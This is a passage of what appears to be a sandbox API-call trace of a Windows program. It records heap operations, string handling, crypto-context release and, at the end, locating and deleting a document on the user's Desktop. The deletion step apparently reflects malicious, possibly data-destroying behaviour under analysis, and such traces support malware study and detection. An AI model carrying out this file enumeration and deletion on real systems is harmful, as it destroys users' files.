Size=0x10) returned 0x24aa740 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.262] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.262] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.262] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0159.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0159.266] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.266] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0159.266] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0159.266] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.266] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0159.266] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.266] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.266] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0159.267] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.267] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.267] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.267] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.267] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.267] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0159.267] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0159.268] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0159.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0159.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.268] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0159.268] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.268] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.268] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0159.268] FreeLibrary (hLibModule=0x74d40000) returned 1 [0159.268] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.268] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.272] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.272] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0159.272] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0159.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0159.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0159.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0159.273] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0AFNgyUK36kK5YHPO1.odp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp", lpFilePart=0x8bedfc*="0AFNgyUK36kK5YHPO1.odp") returned 0x3c [0159.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0159.273] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0afngyuk36kk5yhpo1.odp")) returned 0x20 [0159.273] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d48680, ftCreationTime.dwHighDateTime=0x1d4c9d5, ftLastAccessTime.dwLowDateTime=0x32b45a40, ftLastAccessTime.dwHighDateTime=0x1d4c87b, ftLastWriteTime.dwLowDateTime=0x32b45a40, ftLastWriteTime.dwHighDateTime=0x1d4c87b, nFileSizeHigh=0x0, nFileSizeLow=0xa1f8, dwReserved0=0x11, dwReserved1=0x4, cFileName="0AFNgyUK36kK5YHPO1.odp", cAlternateFileName="0AFNGY~1.ODP")) returned 0xaa5660 [0159.274] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0afngyuk36kk5yhpo1.odp")) returned 1 [0159.275] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d48680, ftCreationTime.dwHighDateTime=0x1d4c9d5, ftLastAccessTime.dwLowDateTime=0x32b45a40, ftLastAccessTime.dwHighDateTime=0x1d4c87b, ftLastWriteTime.dwLowDateTime=0x32b45a40, ftLastWriteTime.dwHighDateTime=0x1d4c87b, nFileSizeHigh=0x0, nFileSizeLow=0xa1f8, dwReserved0=0x11, dwReserved1=0x4, cFileName="0AFNgyUK36kK5YHPO1.odp", cAlternateFileName="0AFNGY~1.ODP")) returned 0 [0159.275] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0159.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0159.275] HeapFree (in: hHeap=0x25c0000, 